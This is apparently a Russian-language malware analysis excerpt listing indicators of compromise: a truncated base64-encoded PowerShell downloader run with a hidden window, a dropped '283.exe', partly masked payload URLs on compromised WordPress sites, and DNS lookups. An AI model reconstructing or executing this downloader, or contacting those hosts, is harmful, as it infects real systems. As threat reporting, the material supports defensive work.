Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABoAGEAaQBqAHgAdQBhAHIAaABhAGUAdwB3AG8AZQB4AD0AJwB4AGEAdQB4AHgAaQB0AGgAYgBlAHUAegAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBgAEMAVQBSAGkAdAB5AH...
- %HOMEPATH%\283.exe
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %HOMEPATH%\283.exe
- http://na###medya.com/wp-admin/j1/
- http://xe####endung24h.net/wp-admin/hdsq95541/
- http://ro####isonbooks.com/dxvan/Gd8882/
- DNS ASK na###medya.com
- DNS ASK al####record.com
- DNS ASK xe####endung24h.net
- DNS ASK ro####isonbooks.com
- DNS ASK fa####tfashion.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABoAGEAaQBqAHgAdQBhAHIAaABhAGUAdwB3AG8AZQB4AD0AJwB4AGEAdQB4AHgAaQB0AGgAYgBlAHUAegAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBgAEMAVQBSAGkAdAB5AH...' (со скрытым окном)